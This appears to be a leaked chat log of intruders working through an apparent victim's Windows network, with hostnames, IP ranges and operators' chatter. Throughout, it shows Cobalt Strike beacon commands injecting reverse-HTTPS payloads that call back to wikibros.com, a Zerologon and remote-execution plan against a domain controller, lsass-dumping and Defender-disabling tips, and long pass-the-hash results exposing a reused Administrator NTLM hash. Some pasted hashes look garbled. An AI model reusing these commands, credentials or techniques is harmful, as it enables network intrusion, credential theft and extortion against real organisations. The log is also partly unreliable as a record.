SARAH-2.overland.com SERVICE-16.overland.com TESTLAB-PACK2.overland.com PHOTO-03.overland.com SHAENA-3.overland.com SERVICE-14.overland.com TESTLAB.overland.com DC-RETURNS9.overland.com DC-TAGGING2.overland.com TESTLAB-PACKv9.overland.com PHOTO-04.overland.com WEBDEV-1.overland.com DC-ADHOST.overland.com DC-HATS.overland.com ACCOUNTING-02.overland.com RONOPENSHAW3.overland.com SERVICE-04.overland.com LOGAN.overland.com INVENTORY-03.overland.com DC-RETURNS4.overland.com MAHESH-2.overland.com DC-RETURNS5.overland.com STATION-03.overland.com SERVICE-08.overland.com WEBDEV-3.overland.com ACCOUNTING-01.overland.com ACCOUNTING-05.overland.com INVENTORY-04.overland.com DC-PACK3a.overland.com SERVICE-20.overland.com GABRIEL-3.overland.com TODD-DESK2.overland.com ECOMM-04.overland.com JAY-OFFICE2.overland.com DC-PACK6.overland.com INVENTORY-05.overland.com LARRY-2.overland.com DC-SHIPPING4.overland.com LAPTOP-D2.overland.com ROGERLEAHY-2.overland.com ACCT2.overland.com SERVICE-03.overland.com FACILITIES-02.overland.com ACCOUNTING-04.overland.com DC-WAREHOUSE105.overland.com SERVICE-02.overland.com STATION-02A.overland.com TESTLAB-HQv9.overland.com LINDA-2.overland.com WEBDEV-4.overland.com LAPTOP-D3.overland.com ACCOUNTING-06.overland.com ACCOUNTING-03.overland.com MARIE-DESK.overland.com DC-PACK8.overland.com DC-PACK2.overland.com ECOMM-05.overland.com OVR059-SHIPPING.overland.com DC-RETURNS10.overland.com CONFERENCE-1.overland.com SERVICE-06.overland.com SERVICE-09.overland.com APRIL-DESKTOP.overland.com ToddsBackup.overland.com SERVICE-17.overland.com TAGGING.overland.com SERVICE-12.overland.com DC-PACK5a.overland.com SERVICE-15.overland.com DC-RETURNS8.overland.com HQSHIP-2.overland.com DC-WAREHOUSE107.overland.com WENDI-LAPTOP2.overland.com SERVICE-01.overland.com STATION-10a.overland.com LAPTOP-I1.overland.com DC-PACK7.overland.com AMBER-OFFICE2.overland.com SERVICE-05.overland.com STATION-09A.overland.com TOM-LAPTOP.overland.com DC-WAREHOUSE106.overland.com
```
```
OSCAR-TESTDB.overland.com RDPAPP1.overland.com HYPERV-DEV3.overland.com HYPERVHOSTRMS.overland.com
```
Shouldn't a machine account be displayed as LA?
```
[+] 10.10.20.5:445 - 10.10.20.5:445 - Success: '.\DC$:aad3b435b51404eeaad3b435b51404ee:203d17368b3abd4e470f5adafbc27b5c'
```
And smb_login works fine with this? Although the credentials are fine, I try to run it, but in the lab the machine account doesn't work at all.
```
[-] 10.10.20.5:445 - Exploit failed [no-access]: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED
```
Well, it must have been noticed by the regular psexec module, but with an additional option.
```
> use auxiliary/admin/smb/psexec_command
[!] * The module auxiliary/admin/smb/psexec_command is deprecated! *
[!] * This module will be removed on or about 2020-09-16
[!] * Use exploit/windows/smb/psexec and the 'Command' target with the cmd/windows/generic payload
```
It is no longer available in new versions =) Hmm, also an option) forgot about it. And why not use psexec_command from metasploit?
I have an idea: upload the DLL to the balloon on the DC, reset the machine account password with Zerologon and use Sharp-SMBExec to run it there. But Sharp-SMBExec doesn't work in the test lab...
```
beacon> execute-assembly /home/user/Desktop/SharpTools/Sharp-SMBExec.exe hash:203d17368b3abd4e470f5adafbc27b5c username:DC$ domain:. target:DC.testlab.local command:rundll32 C:\x64.dll entryPoint -debug
[*] Tasked beacon to run .NET program: Sharp-SMBExec.exe hash:203d17368b3abd4e470f5adafbc27b5c username:DC$ domain:. target:DC.testlab.local command:rundll32 C:\x64.dll entryPoint -debug
[+] host called home, sent: 172333 bytes
[+] received output:
AdminCheck is false
String is not empty
Connected to DC.testlab.local
Current Stage: NegotiateSMB
Using SMB2
SMB Signing is Enabled
Current Stage: NegotiateSMB2
Current Stage: NTLMSSPNegotiate
Authenticating to DC.testlab.local
Authentication Successful
Login Status: True
Service Name is OGFLSZGUECWHMJMQLQRH
Current Stage TreeConnect
Current Stage CreateRequest
Current Stage RPCBind
Current Stage ReadRequest
Current Stage OpenSCManagerW
Current Stage ReadRequest
Current Stage CheckAccess
Something went wrong with DC.testlab.local
Warning: Service not deleted. Please delete Service "OGFLSZGUECWHMJMQLQRH" manually.
```
https://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/
Actually, it helps to search for PCs assigned to users, namely in the "search for techs" task: you select them from ad_users and use this tool to find their PCs, where there will be valuable information about the network, plus information about EDR, backups, etc. Search for keywords like network, admin, tech, etc.
This one https://mediaeveryone.com/channel/general?msg=kKPqGtPJd8Kpmd6BC the exe under which you write in the thread there? https://mediaeveryone.com/channel/general?msg=Xn2ZPrF95sAJ44ecH so isn't it?
I asked if you collected sharpshooter and you said yes. https://github.com/HunnicCyber/SharpSniper wtf? lol? Unsuccessfully trying to get into the Cobalt at likenic.com :thumbsup: there every time the load increases by about 12 bytes. I will try to get into the previous Cobalt, maybe it hasn't been replaced? I can't go any further; I just restarted and couldn't go any further, then Cobalt hung, hung up an empty archive, and the output of adfind went into the beacon and started. I just ran adfind from the toolchain, I don't understand, did you run the output of adfind? Now go to the development of this network in wikibros.com. If all the sessions flew away, so the domain in the second Cobalt? And in general I have worked there with the same domain. If you mean likenic.com, I have not tried to go there since yesterday. The second Cobalt, are there sessions? The domain in the block flew through Citrix, new ones do not spawn, at the same time all the sessions are sagging. Memory protection. [+] Sophos Found! And edr_query? On the files searched, Sophos did not detect it. Tell me what EDR? There is no logon from the user on the victim host? Skipped this, for example vhost. Also, do you only jump in winlogon?
```
beacon> inject 1108 x64 https
[*] Tasked beacon to inject windows/beacon_https/reverse_https (wikibros.com:443) into 1108 (x64)
[+] host called home, sent: 261139 bytes
[-] could not open process 1108: 5
beacon> elevate svc-exe
[*] Tasked beacon to run windows/beacon_https/reverse_https (wikibros.com:443) via Service Control Manager (\\127.0.0.1\ADMIN$\05d9cdb.exe)
[+] host called home, sent: 291332 bytes
[-] Could not start service 05d9cdb on .: 5
```
I'm looking at the list on the balloon. Yeah, where are you jumping, you admin?
The session under SYSTEM where you took the hashdump fell off, sagged for an hour; this computer is not pinged now. Jumping from the first machine to different machines and trying to get SYSTEM, it does not let me inject. To the computer where the hash was knocked out? I thought I had a long time ago... So throw it straight to the gennel; it is well configured, has different methods of dumping lsass etc. It's essentially autopwn for when you have a bunch of lsass available, fun thing; spend the time once to set it up correctly so that you have the VPS set up for this fuckin' thing right at your fingertips. Use this: https://github.com/Hackndo/lsassy. All you can't get right, it's a Win server.
0% loss 139.62.200.190 139.62.200.188 139.62.200.189 139.62.200.114 139.62.192.79 139.62.200.68 139.62.200.101 139.62.200.100 139.62.192.172 139.62.192.187 139.62.192.188 139.62.201.145 139.62.201.141 139.62.234.116 139.62.201.144 139.62.201.146 139.62.201.140 139.62.192.103 139.62.234.41 139.62.201.31 139.62.200.202 139.62.200.203 172.30.240.22 139.62.201.207 139.62.192.164 172.30.243.242 139.62.192.35 139.62.192.200 172.30.243.243 172.30.243.244 172.30.243.241 139.62.192.129 139.62.201.30 10.14.255.11 139.62.193.113 139.62.192.110 139.62.192.200 139.62.193.61 139.62.63.209 139.62.192.78 139.62.192.121 139.62.192.123 139.62.192.122 139.62.192.152 139.62.192.124 139.62.192.153 139.62.200.129 139.62.201.208 139.62.200.20 139.62.200.74 139.62.200.128 139.62.200.221 139.62.234.30 139.62.192.48 139.62.193.78 139.62.200.75 139.62.200.31 139.62.63.213 139.62.201.18 139.62.192.41 139.62.200.32 139.62.200.127 139.62.201.209 139.62.200.125 139.62.200.73 139.62.200.158 139.62.200.169 139.62.200.178 139.62.233.12 139.62.200.27 139.62.201.41 139.62.233.23 139.62.192.59 139.62.200.78 139.62.200.79 139.62.200.168 139.62.192.127 139.62.200.91 139.62.200.124 139.62.101.22 139.62.200.104 139.62.234.55 139.62.192.61 139.62.192.60 139.62.192.154 139.62.192.155 139.62.200.133 139.62.101.21 139.62.101.20
139.62.192.125 139.62.192.128 139.62.192.71 139.62.193.34 139.62.192.58 139.62.232.13 139.62.201.38 139.62.192.56 139.62.126.178 139.62.192.57 139.62.192.75 139.62.192.63 139.62.192.54 139.62.192.47 139.62.192.62 139.62.192.201 139.62.192.231 139.62.193.117 139.62.193.104 139.62.192.228 139.62.192.202 139.62.192.206 139.62.192.229 139.62.192.39 139.62.192.230 139.62.200.145 139.62.193.116 139.62.63.150 139.62.192.36 139.62.200.50 139.62.192.198 139.62.234.40 139.62.192.199 139.62.247.104 139.62.192.178 139.62.232.253 139.62.193.115 139.62.192.162 139.62.200.88 139.62.200.119 139.62.233.34 139.62.101.42 139.62.193.114 139.62.192.113 139.62.192.166 139.62.192.165 139.62.192.33 139.62.200.177 139.62.200.87 139.62.200.179 139.62.192.193 139.62.192.213 139.62.244.4 139.62.192.189 139.62.192.184 139.62.193.74 139.62.193.72 139.62.200.89 139.62.192.163 139.62.193.76 139.62.193.73 139.62.200.34 139.62.192.185 139.62.193.70 139.62.247.108 139.62.193.71 139.62.192.158 139.62.201.36 139.62.201.19 139.62.192.139 139.62.201.40 139.62.192.4 139.62.192.161 139.62.63.166 139.62.192.68 139.62.63.246 139.62.201.211 139.62.247.109 139.62.232.249 139.62.192.160 139.62.192.159 139.62.247.112 139.62.247.111 139.62.192.242 139.62.200.174 139.62.247.110 139.62.232.248 139.62.192.114 139.62.200.121 139.62.232.247 139.62.232.251 139.62.200.173 139.62.232.252 139.62.192.73 139.62.192.38 139.62.200.176 139.62.200.175 139.62.192.219 139.62.192.171 139.62.192.186 139.62.192.136 139.62.200.172 139.62.192.135 139.62.192.146 139.62.234.19 139.62.200.134 139.62.200.220 139.62.200.135 139.62.200.137 139.62.233.27 139.62.193.10 172.30.243.254 139.62.200.110 139.62.200.85 139.62.201.201 139.62.193.5 139.62.192.133 172.18.65.99 139.62.193.9 139.62.234.24 139.62.192.126 139.62.193.8 139.62.201.198 139.62.192.32 139.62.192.112 139.62.234.23 139.62.192.134 139.62.192.132 139.62.200.66 139.62.63.106 139.62.63.186 139.62.192.67 139.62.200.113 139.62.200.59 139.62.193.45 139.62.192.66 139.62.63.11 
139.62.192.246 172.30.243.253 139.62.192.130 172.30.243.251 139.62.193.42 172.30.243.252 139.62.200.107 139.62.200.83 139.62.200.109 139.62.234.96 139.62.192.90 139.62.201.143 139.62.193.41 139.62.193.43 139.62.200.64 139.62.201.142 139.62.193.7 139.62.201.67 139.62.200.151 139.62.234.64 139.62.201.210 139.62.193.3 139.62.193.1 139.62.193.6 139.62.200.204 139.62.200.65 139.62.200.106 139.62.200.108 139.62.200.153 139.62.192.223 139.62.60.52 139.62.200.123 139.62.200.69 139.62.193.37 139.62.200.148 139.62.234.29 139.62.193.2 139.62.192.34 139.62.200.111 139.62.193.44 139.62.200.62 139.62.232.12 139.62.193.11 139.62.193.16 139.62.193.38 139.62.234.121 139.62.193.4 139.62.192.9 139.62.193.105 139.62.234.61 139.62.193.29 139.62.200.61 139.62.192.190 139.62.193.40 139.62.200.112 139.62.193.106 139.62.200.118 139.62.200.77 139.62.193.39 139.62.200.117 139.62.200.72 139.62.200.116 139.62.200.132 139.62.200.191 139.62.192.81 139.62.201.87 139.62.233.16 139.62.192.109 139.62.200.120 139.62.233.13
Hosts pinged; I separate the up ones from the down ones, then brute-force. These are the ones that fit; is the total list from here the one above? Then ping and brute-force the servers, gather more. Is the edukeyserver OS? Is that what we have?
[+] 139.62.58.7:445 - 139.62.58.7:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.172:445 - 139.62.59.172:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.150:445 - 139.62.59.150:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.213:445 - 139.62.59.213:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.59.240:445 - 139.62.59.240:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.58.100:445 - 139.62.58.100:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.116:445 - 139.62.59.116:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.236:445 - 139.62.58.236:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.79:445 - 139.62.59.79:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.67:445 - 139.62.58.67:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.20:445 - 139.62.59.20:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.184:445 - 139.62.57.184:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.234:445 - 139.62.59.234:445 - Success: 
'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f70886839806891019eb43397e2668' Administrator [+] 139.62.58.117:445 - 139.62.58.117:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.113:445 - 139.62.57.113:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.47:445 - 139.62.58.47:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.112:445 - 139.62.59.112:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.81:445 - 139.62.58.81:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.117:445 - 139.62.59.117:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.193:445 - 139.62.58.193:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.208:445 - 139.62.57.208:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f708868398068391019eb43397e2668' Administrator [+] 139.62.58.72:445 - 139.62.58.72:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.135:445 - 139.62.59.135:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.203:445 - 139.62.59.203:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.58.97:445 - 139.62.58.97:445 - Success: 
'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.68:445 - 139.62.58.68:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.75:445 - 139.62.58.75:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.223:445 - 139.62.58.223:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.59.99:445 - 139.62.59.99:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.200:445 - 139.62.59.200:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.232:445 - 139.62.57.232:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f70886839806891019eb43397e2668' Administrator [+] 139.62.59.35:445 - 139.62.59.35:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.216:445 - 139.62.57.216:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f70886839806891019eb43397e2668' Administrator [+] 139.62.59.223:445 - 139.62.59.223:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f70886839806891019eb43397e2668' Administrator [+] 139.62.57.100:445 - 139.62.57.100:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.19:445 - 139.62.57.19:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.66:445 - 139.62.57.66:445 - Success: 
'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.220:445 - 139.62.59.220:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.86:445 - 139.62.58.86:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.134.212:445 - 139.62.134.212:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.215:445 - 139.62.58.215:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.57.240:445 - 139.62.57.240:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.57.152:445 - 139.62.57.152:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.59.97:445 - 139.62.59.97:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.43:445 - 139.62.58.43:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.129:445 - 139.62.57.129:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.19:445 - 139.62.59.19:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.99:445 - 139.62.58.99:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.144:445 - 139.62.58.144:445 - Success: 
'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.71:445 - 139.62.59.71:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.92:445 - 139.62.59.92:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.170:445 - 139.62.57.170:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.15:445 - 139.62.59.15:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.49:445 - 139.62.57.49:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.212:445 - 139.62.57.212:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.58.118:445 - 139.62.58.118:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.127:445 - 139.62.59.127:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.191:445 - 139.62.57.191:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.57.11:445 - 139.62.57.11:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.165:445 - 139.62.59.165:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.243:445 - 139.62.58.243:445 - Success: 
'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.59.0:445 - 139.62.59.0:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.216:445 - 139.62.58.216:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.58.51:445 - 139.62.58.51:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.0:445 - 139.62.58.0:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.135:445 - 139.62.58.135:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.44:445 - 139.62.57.44:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.210:445 - 139.62.58.210:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.58.105:445 - 139.62.58.105:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.231:445 - 139.62.58.231:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.59.16:445 - 139.62.59.16:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.225:445 - 139.62.58.225:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.58.153:445 - 139.62.58.153:445 - Success: 
'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.23:445 - 139.62.57.23:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.130:445 - 139.62.57.130:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.251:445 - 139.62.59.251:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.59.212:445 - 139.62.59.212:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.58.221:445 - 139.62.58.221:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.59.34:445 - 139.62.59.34:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.27:445 - 139.62.57.27:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.192:445 - 139.62.59.192:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.208:445 - 139.62.58.208:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f708868398068391019eb43397e2668' Administrator [+] 139.62.57.157:445 - 139.62.57.157:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.52:445 - 139.62.57.52:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.74:445 - 139.62.58.74:445 - Success: 
'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.82:445 - 139.62.57.82:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.182:445 - 139.62.57.182:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.69:445 - 139.62.57.69:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.201:445 - 139.62.57.201:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.48:445 - 139.62.58.48:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.177:445 - 139.62.58.177:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.201:445 - 139.62.58.201:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.75:445 - 139.62.59.75:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.20:445 - 139.62.58.20:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.56:445 - 139.62.57.56:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.232:445 - 139.62.59.232:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f70886839806891019eb43397e2668' Administrator [+] 139.62.58.237:445 - 139.62.58.237:445 - Success: 
'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980689681019eb43397e2668' Administrator [+] 139.62.57.13:445 - 139.62.57.13:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.58.93:445 - 139.62.58.93:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.161:445 - 139.62.59.161:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.236:445 - 139.62.59.236:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f70886839806891019eb43397e2668' Administrator [+] 139.62.57.118:445 - 139.62.57.118:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.59.229:445 - 139.62.59.229:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator [+] 139.62.57.227:445 - 139.62.57.227:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f70886839806891019eb43397e2668' Administrator [+] 139.62.59.87:445 - 139.62.59.87:445 - Success: 'WORKSTATION\Administrator:aad3b435b51404eeaad3b435b51404ee:011f7088683980681019eb43397e2668' Administrator ``okay if not we'll go to all 100 pc's and look for admin hashes or more brute-force accesses and so on`` [-] 139.62.58.40:445 - 139.62.58.40:445 - Could not connect `````` [-] 139.62.57.116:445 - 139.62.57.116:445 - Could not connect `````` [-] 139.62.59.174:445 - 139.62.59.174:445 - Could not connect ``As a local admin, check this account on the server OS yet.`` [-] 